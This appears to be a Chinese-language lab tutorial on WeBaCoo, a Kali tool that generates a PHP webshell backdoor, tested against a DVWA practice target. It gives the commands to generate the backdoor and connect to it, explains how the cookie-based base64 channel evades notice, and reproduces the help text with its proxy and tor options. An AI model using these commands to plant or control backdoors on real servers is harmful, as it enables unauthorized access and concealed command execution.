webacoo
webshell其實就是放置在服務器上的一段代碼
kali中生成webshell的工具
WeBaCoo(Web Backdoor Cookie)
特點及使用方法
- 類終端的shell
- 編碼通信內容通過cookie頭傳輸,隱蔽性強
- cookie中傳遞數據使用的參數:
- cm:base64編碼的命令
- cn:服務器用於返回數據的cookie頭的名
- cp:返回信息定界符
- 生成服務端
- Webacoo -g -o a.php
- 客戶端連接
- Webacoo -t -u http://x.x.x.x/a.php
生成一個webshell測試:
查看文件內容可以看到是被base64加密的
在DVWA靶機環境中上傳該文件
然后使用webacoo連接服務器
成功連接:
可以直接執行系統命令:
webacoo的隱蔽性高之一是因為他采用的是cookie傳參,且為base64加密
接着使用wireshark抓包查看其cookie參數:
這里cm選項中的字符串經過解碼后就是我們傳入的命令ls
服務器端返回的setcookie中的M-cookie字段就是命令返回的結果,cp變量值為QXg@和M-cookie中的開頭對應,為界定符。
這里的M-cookie可以在連接webshell時通過-c參數自定義:
除此外,webacoo還可以在連接時使用-p選項,通過代理服務器連接目標服務器
更多參數可以通過webacoo -h查看幫助手冊
1 root@bogon:~# webacoo -h 2 3 WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit 4 Copyright (C) 2011-2012 Anestis Bechtsoudis 5 { @anestisb | anestis@bechtsoudis.com | http(s)://bechtsoudis.com } 6 7 8 Usage: webacoo [options] 9 10 Options: 11 -g Generate backdoor code (-o is required) 12 13 -f FUNCTION PHP System function to use 14 FUNCTION 15 1: system (default) 16 2: shell_exec 17 3: exec 18 4: passthru 19 5: popen 20 21 -o OUTPUT Generated backdoor output filename 22 23 -r Return un-obfuscated backdoor code 24 25 -t Establish remote "terminal" connection (-u is required) 26 27 -u URL Backdoor URL 28 29 -e CMD Single command execution mode (-t and -u are required) 30 31 -m METHOD HTTP method to be used (default is GET) 32 33 -c C_NAME Cookie name (default: "M-cookie") 34 35 -d DELIM Delimiter (default: New random for each request) 36 37 -a AGENT HTTP header user-agent (default exist) 38 39 -p PROXY Use proxy (tor, ip:port or user:pass:ip:port) 40 41 -v LEVEL Verbose level 42 LEVEL 43 0: no additional info (default) 44 1: print HTTP headers 45 2: print HTTP headers + data 46 47 -l LOG Log activity to file 48 49 -h Display help and exit 50 51 update Check for updates and apply if any